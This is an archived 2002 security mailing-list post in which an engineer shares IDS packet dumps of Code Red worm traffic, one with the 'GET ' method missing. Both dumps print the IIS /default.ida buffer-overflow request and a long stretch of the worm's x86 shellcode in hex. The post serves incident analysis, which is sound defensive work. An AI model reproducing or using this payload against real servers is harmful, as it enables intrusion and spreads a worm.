> Not yet. I have some questions, though: > > Do you have packet traces of one of these? I'm curious as to what they > looks like, i.e. are they IP fragments, seperate TCP packets, etc..? > > Are the ones that have the "GET " seperated otherwise regular Code Red? > Have you caught a whole transaction? It occurs that this could > potentially be a human attacker that figured out he had to bypass the > filter. If they look like Code Red, grabbing one will tell you if it's a > variant or not. If you get a packet trace of the whole thing, I can tell > you pretty quickly. Hi, I've got a bunch of traces of the code red packets without the GET. I haven't done any kind of analysis - only a quick glance, but it seems like this is just about the only code red I'm seeing lately. Here's a dump of one that hit me today, and beneath that is a random code red w/GET packet trace. I hope this helps. 01/10-14:01:50.447296 0:6:28:9C:27:C0 -> 0:D0:B7:3B:2C:72 type:0x800 len:0x24E 210.85.54.146:4985 -> 134.243.238.34:80 TCP TTL:42 TOS:0x0 ID:26199 DF ***PA* Seq: 0x248727E5 Ack: 0x38A2DC62 Win: 0x88E0 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F 4E 4E 4E /default.ida?NNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E E9 30 39 NNNNNNNNNNNNN.09 30 E6 38 35 38 EC 62 64 33 E7 38 30 31 E9 30 39 0.858.bd3.801.09 30 E6 38 35 38 EC 62 64 33 E7 38 30 31 E9 30 39 0.858.bd3.801.09 30 E6 38 35 38 EC 62 64 33 E7 38 30 31 E9 30 39 0.858.bd3.801.09 30 E9 30 39 30 E8 31 39 30 E0 30 63 33 E0 30 30 0.090.190.0c3.00 33 E8 62 30 30 E5 33 31 62 E5 33 66 66 E0 30 37 3.b00.31b.3ff.07 38 E0 30 30 30 E0 30 3D 61 20 20 48 54 54 50 2F 8.000.0=a HTTP/ 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 1.0..Content-typ 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F 53 54 e: text/xml.HOST 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A 20 41 :www.worm.com. A 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E 74 65 ccept: */*.Conte 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36 39 20 nt-length: 3569 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53 56 57 ....U........SVW 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC CC CC ................ F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A 0B 00 ....p........... 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64 A1 00 ...h.........d.. 00 00 00 89 47 08 64 89 3D 00 ....G.d.=. 11/11-05:05:07.429410 0:6:28:9C:27:C0 -> 0:D0:B7:3B:2C:72 type:0x800 len:0x5CE 203.59.219.242:4473 -> 134.243.10.195:80 TCP TTL:109 TOS:0x0 ID:38723 DF ***PA* Seq: 0x8DAB83B8 Ack: 0xBCDDAFBE Win: 0x4320 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E ?NNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E NNNNNNNNNNNNNNNN 4E E9 30 39 30 E6 38 35 38 EC 62 64 33 E7 38 30 N.090.858.bd3.80 31 E9 30 39 30 E6 38 35 38 EC 62 64 33 E7 38 30 1.090.858.bd3.80 31 E9 30 39 30 E6 38 35 38 EC 62 64 33 E7 38 30 1.090.858.bd3.80 31 E9 30 39 30 E9 30 39 30 E8 31 39 30 E0 30 63 1.090.090.190.0c 33 E0 30 30 33 E8 62 30 30 E5 33 31 62 E5 33 66 3.003.b00.31b.3f 66 E0 30 37 38 E0 30 30 30 E0 30 3D 61 20 20 48 f.078.000.0=a H 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 TTP/1.0..Content 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A -type: text/xml. 48 4F 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F HOST:www.worm.co 6D 0A 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 m. Accept: */*.C 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 ontent-length: 3 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 569 ....U....... 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 .SVW............ CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 ........p....... E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF .......h........ FF 64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 .d......G.d.=... 00 E9 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE ..o.....`....... FF FF FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 ........h....... 85 F4 FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 .......X......w. 9B 0A 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 ......p......... 00 8B 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 ...X...........X FE FF FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 .....X......xu.. 85 58 FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 .X.........X...3 C0 66 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B .f..=MZ......... 8D 58 FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 .X....Q<..X...3. 66 8B 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 f.....PE....y... 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B ..X....B<..X.... 54 01 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B T.x..X.....T.... 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D .T....H...X..... 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52 4E L.....L....:KERN 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45 ..3.....L....x.E 4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 L32.. .....X.... 8D 34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF .4.....T.....X.. FF 03 42 20 89 85 4C FE FF FF C7 85 48 FE FF FF ..B ..L.....H... 00 00 00 00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 ........H....... 8D 48 FE FF FF 8B 95 4C FE FF FF 83 C2 04 89 95 .H.....L........ 4C FE FF FF 8B 85 54 FE FF FF 8B 8D 48 FE FF FF L.....T.....H... 3B 48 18 0F 8D C0 00 00 00 8B 95 4C FE FF FF 8B ;H.........L.... 02 8B 8D 58 FE FF FF 81 3C 01 47 65 74 50 0F 85 ...X....<.GetP.. A0 00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE ......L.......X. FF FF 81 7C 01 04 72 6F 63 41 0F 85 84 00 00 00 ...|..rocA...... 8B 95 48 FE FF FF 03 95 48 FE FF FF 03 95 58 FE ..H.....H.....X. FF FF 8B 85 54 FE FF FF 8B 48 24 33 C0 66 8B 04 ....T....H$3.f.. 0A 89 85 4C FE FF FF 8B 8D 54 FE FF FF 8B 51 10 ...L.....T....Q. 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C FE FF FF ..L....L....L... 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95 4C FE ..L.....L.....L. FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B 85 ....L.....X..... 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF T....H......L... 8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE ..L.....X.....p. FF FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD ................ F0 FE FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 .....G.d.......p FE FF FF 00 75 05 E9 38 08 00 00 C7 85 4C FE FF ....u..8.....L.. FF 01 00 00 00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 .........L...... 89 8D 4C FE FF FF 8B 95 68 FE FF FF 0F BE 02 85 ..L.....h....... C0 0F 84 8D 00 00 00 8B 8D 68 FE FF FF 0F BE 11 .........h...... 83 FA 09 75 21 8B 85 68 FE FF FF 83 C0 01 8B F4 ...u!..h........ 50 FF 95 90 FE FF FF 3B F4 90 43 4B 43 4B 89 85 P......;..CKCK.. 34 FE FF FF EB 2A 8B F4 8B 8D 68 FE FF FF 51 8B 4....*....h...Q. 95 34 FE FF FF 52 FF 95 70 FE FF FF 3B F4 90 43 .4...R..p...;..C 4B 43 4B 8B 8D 4C FE FF FF 89 84 8D 8C FE FF FF KCK..L.......... EB 0F 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF ....h........h.. FF 8B 85 68 FE FF FF 0F BE 08 85 C9 74 02 EB E2 ...h........t... 8B 95 68 FE FF FF 83 C2 01 89 95 68 FE FF FF E9 ..h........h.... 53 FF FF FF 8B 85 68 FE FF FF 83 C0 01 89 85 68 S.....h........h FE FF FF 8B 4D 08 8B 91 84 00 00 00 89 95 6C FE ....M.........l. FF FF C7 85 4C FE FF FF 04 00 00 00 C6 85 D0 FE ....L........... FF FF 68 8B 45 08 89 85 D1 FE FF FF C7 85 D5 FE ..h.E........... FF FF 5B 53 53 FF C7 85 D9 FE FF FF 63 78 90 90 ..[SS.......cx.. 8B 4D 08 8B 51 10 89 95 50 FE FF FF 83 BD 50 FE .M..Q...P.....P. FF FF 00 75 26 8B F4 6A 00 8D 85 4C FE FF FF 50 ...u&..j...L...P 8B 8D 68 FE FF FF 51 8B 55 08 8B 42 08 50 FF 95 ..h...Q.U..B.P.. 6C FE FF FF 3B F4 90 43 4B 43 l...;..CKC Ken Eichman Senior Security Engineer Chemical Abstracts Service Tel: (614) 447-3838 ext 3230 2540 Olentangy River Road Fax: (614) 447-3855 Columbus, OH 43210 Email: keichmanat_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 14:28:47 PST